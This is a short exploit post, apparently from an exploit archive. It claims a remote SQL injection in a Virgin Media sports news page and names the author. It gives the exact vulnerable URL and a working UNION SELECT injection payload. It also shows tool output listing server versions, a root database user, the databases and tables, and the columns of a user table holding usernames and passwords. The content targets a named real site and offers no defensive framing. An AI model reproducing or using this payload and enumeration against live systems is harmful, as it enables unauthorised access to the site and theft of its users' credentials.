----------------------------------------------------------------------------------------------- [+] Virginmedia.com suffers from a remote SQL injection vulnerability [+] Author: Rohit Bansal --------------------------------------------------------------------------------------- Host Information Server = Apache/2.2.2 (Fedora) Version = 5.0.22-standard-log Powered by = PHP/5.1.6 Current User = root@192.168.3.11 Current Database = WorldSports2 Supports Union = yes Union Columns = 10 Url| http://othersports.virginmedia.com/minorsports/news.php?id=25418 Vuln: http://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+and 1=0 Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10 Comment: -- Visible Column: 3 Hexed: True Cookie: Keyword: Param: Database:mysql information_schema AFC1 AusOpen ESPN_News ESPNdeportes EuropeanLeagues FAPL Greyhounds MatchLive2 MatchLive_Cup OscarsQuizContent PABrits PAOscars PAShowbiz Platform QuizContent RolandGarros2007 Rugby Three US_Sports WAPStats WorldCup WorldSports WorldSports2 cricket mysql optus_tennis pa_tennis pccw_facup pslvodacom umusic universal us_open Tables:user columns_priv db func help_category help_keyword help_relation help_topic host proc procs_priv tables_priv time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type user Columns: Table user Username Password DateStamp Status userid name email location --------------------------------------------------------------------------------------- [+]^Rohit Bansal [rohitisback@gmail.com] [+] Schap.org, Infysec,Evilfinger ---------------------------------------------------------------------------------------